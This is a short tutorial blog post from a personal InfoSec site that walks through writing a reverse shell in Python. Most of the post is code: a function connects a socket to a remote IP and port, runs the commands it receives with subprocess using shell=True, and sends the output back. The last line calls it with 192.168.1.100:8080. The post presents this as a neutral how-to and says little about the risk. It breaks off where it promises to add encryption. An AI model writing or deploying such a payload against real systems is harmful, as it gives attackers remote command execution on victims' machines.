top of page

CYBER & INFOSEC

"blogger, InfoSec specialist, super hero ... and all round good guy" 

DISCUSSIONS, CONCEPTS & TECHNOLOGIES FOR THE WORLD OF

JOIN THE DISCUSSION

Search
    • Oct 31, 2023
    • 2 min read

How to write a reverse shell

A reverse shell is a type of network connection in which a remote computer establishes a connection to a local computer and allows the remote computer to execute commands on the local computer. This can be useful in a number of situations, such as when a local computer is behind a firewall and needs to connect to a remote computer, or when a local computer needs to be accessed remotely by a third party.

Here is an example of how to write a simple reverse shell in Python:


First, we will need to import the necessary libraries. In this example, we will use the socket library to create the network connection and the subprocess library to execute commands:




import socket

import subprocess



Next, we will create a function to establish the reverse shell connection. This function will take two arguments: the IP address of the remote computer and the port number that we want to use for the connection:




def reverse_shell(ip, port):

# Create a socket object

s = socket.socket()


# Connect to the remote computer

s.connect((ip, port))



Once the connection is established, we can use the subprocess library to execute commands on the local computer. For example, we can use the



subprocess.Popen() function to execute a command and capture the output:





def reverse_shell(ip, port):

# Create a socket object

s = socket.socket()


# Connect to the remote computer

s.connect((ip, port))


# Execute a command and capture the output

cmd = s.recv(1024).decode()

output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)



We can then send the output of the command back to the remote computer using the send() function:




def reverse_shell(ip, port):

# Create a socket object

s = socket.socket()


# Connect to the remote computer

s.connect((ip, port))


# Execute a command and capture the output

cmd = s.recv(1024).decode()

output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)


# Send the output back to the remote computer

s.send(output.stdout.read())

s.send(output.stderr.read())



Finally, we can call the function and pass in the IP address and port number of the remote computer to establish the reverse shell connection:




reverse_shell('192.168.1.100', 8080)



Okay, lets build on what we know and get a little more complicated by adding some encryption and error checking.



Recent Posts

See All
bottom of page